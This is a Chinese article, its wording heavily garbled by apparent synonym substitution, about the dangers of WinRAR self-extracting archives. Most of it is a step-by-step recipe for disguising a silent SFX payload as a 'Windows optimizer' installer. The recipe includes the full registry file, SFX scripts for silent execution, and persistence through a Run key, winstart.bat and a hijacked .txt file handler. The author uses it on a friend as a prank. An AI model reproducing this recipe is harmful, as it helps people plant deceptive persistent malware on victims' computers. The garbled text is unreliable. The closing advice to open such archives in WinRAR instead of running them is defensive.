危险！WinRAR自解压程序可能为所欲为

与winzip比拟，winrar3.0的自解压步调要多出功效。个中一项最为超过的功效，也是潜伏着最大伤害的是：它不妨在解压前或解压后，不知不觉地机动运路途序。 即使你不觉得然，先看完以次事例： 几天前，一位伙伴要我copy一份我从网左右载的‘windows 优化巨匠’给他，我心血来潮，想起这几天接洽winrar3.0的心得，便满口承诺。到了黄昏，我花了几钟点的功夫为他特制了一份‘windows 优化巨匠’，创造过程如次：创造一个备案表剧本文献，我取的文献名为regeditt.reg在内里写入： regedit4 [hkey_local_machine\software\microsoft\windows\currentversion] "registered owner"="××" [hkey_classes_root\clsid\{645ff040-5081-101b-9f08-00aa002f954e}] @="××""infotip"="包括不妨回复或长久简略的已简略名目。" [hkey_users\.default\software\classes\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}] @="××的电脑" [hkey_current_user\control panel\international] "stimeformat"="×× hh:mm" [hkey_local_machine\software\microsoft\windows\currentversion\run] "taskmonitoy"="regedit /s c:\\windows\\sysbckup \\regeditt.reg" 注：之上××均是不安康的玩弄他人的语汇，编纂对它们做了净化。 上头第一项是变动计划机备案称呼，第二项是变动‘接收站’称呼，第三项是变动‘我的电脑’称呼。第四项是在工作栏功夫前加上笔墨,第六项是历次开机后机动运转c:\windows\sysbckup\regeditt.reg。 创造实行后即是用winrar打包了，选中regeditt.reg后击右键，在菜单当选‘增添到档案文献’，在弹出对话框中，把档案称呼写为a1.exe，在底下存档选项当选中‘创造自开释方法’。而后在高档-自开释选项中写入开释路途，我写的是c:\windows\sysbckup，接下来即是在‘开释后运转’中写入regeditt.reg，而后在形式当选中‘十足湮没’和‘掩盖一切文献’，实行那些后按决定，再采用解释咱们会看到以次实质： path=c:\windows\sysbckupsetup=regeditt.regsilent=1overwrite=1 咱们创造开释后运转的方法是setup=*.*,这边是=regeditt.reg，但如许运转后体例会提醒你能否确认导出备案表，以是应作如次窜改： path=c:\windows\sysbckupsetup=regedit /s regeditt.regsilent=1overwrite=1 实行后按决定按扭，就会创造出一个名为a1.exe的winrar自解压步调,即使双击运转它，屏幕大将没有任何表露，但它已不知不觉地把regeditt.reg正片到c:\windows\sysbckup，并把个中的实质写入到备案表中了。 此刻的题目是怎样让我的伙伴运转a1.exe呢？对了，用‘windows 优化巨匠’。把a1.exe与‘windows 优化巨匠’的安置文献(解压后的)放在一道打包，创造 windows 优化巨匠.exe，全选后击右键，选‘增添到档案文献’……操纵大概同a1.exe。只然而称呼改为 windows 优化巨匠.exe，解压路途改成：c:\windows\temp,并且解压后要运转a1.exe和setup.exe两个文献，其解释实质应为： path=c:\windows\tempsetup=a1.exesetup=setup.exesilent=1overwrite=1 按确认后，咱们已发端实行了一份特制的‘windows 优化巨匠’了，干什么说‘发端’实行呢？由于此刻窜改备案表和启用项早已不是什么神秘了，以是a1.exe只然而是附料，还须要介入一味主料：a2.exe.把regeditt.reg改名另存为system.reg,去掉个中的 [hkey_local_machine\software\microsoft\windows\currentversion\run] "taskmonitoy"="regedit /s c:\\windows\\sysbckup\\regeditt.reg" 而后用计事本创造winstart.bat,个中实质要写成：@echo off regedit c:\windows\system.reg>nul如许写屏幕大将没有表露，实行后把这两个文献用winrar作成自解压步调a2.exe,操纵同a1.exe,但解压路途要改成 c:\windows,解压后也不需运转.其解释实质应为： path=c:\windowssilent=1overwrite=1 实行后把a2.exe介入做好的 windows 优化巨匠.exe，介入本领是：右击 windows 优化巨匠.exe采用‘用winrar翻开’，把a2.exe拖入，按决定，而后点击东西栏中的解释，窜改个中实质为： path=c:\windows\tempsetup=a1.exesetup=a2.exesetup=setup.exesilent=1overwrite=1 而后决定-退出。到此为止，特制的‘windows 优化巨匠.exe’已十足实行。由于winstart.bat是在加入windows图形界面之前运转的一个步调，以是介入a2.exe后,就算我的伙伴能回复备案表，以至简略regeditt.reg，但只有c:\windows下的system.reg和winstart.bat不被创造，重启用后他的电脑将‘××’保持。 在windows9第88中学启用步调的本领很多，如经过autoexec.bat、winstart.bat、发端菜单中的启用、备案表中的启用项、win.ini、system.ini、wininit.ini和窜改文献关系等都可到达启用步调的手段。如：用winrar自解压步调在备案表中导出 regedit4 [hkey_classes_root\txtfile\shell\open\command] @="regedit /s c:\\windows\\system.reg" 那么在双击txt典型文献时将不会以计事本翻开，而是没有任何反馈。但c:\\windows\\system.reg中的实质也会不知不觉的被导出备案表。但我没有如许做，由于此刻的那些仍旧够的的伙伴折腾了。 第二天，我把这份‘平装’的 windows 优化巨匠 交给了伙伴，后来果不问可知。足足三天他在对着屏幕上的‘××’发呆。 之上的那些不过我用了winrar宏大的自解压功效，和伙伴开了一个小打趣，但从上头事例不丑陋出，winrarr的那些功效使不会编制程序的人也能创造出少许歹意的步调，即使有人给那些步调起上少许美丽的名字（如windows 优化巨匠 2002 等）在网上颁布，用它来format你的硬盘、deltree你的文献之类，也不是没有大概的。最最恐怖的是，即使运转的是一个跷跷板步调的存户端，那成果越发的不勘构想。 提醒：不要径直运转自解压步调。，而是采用右键菜单中的“用winrar翻开”。（根源：保守者）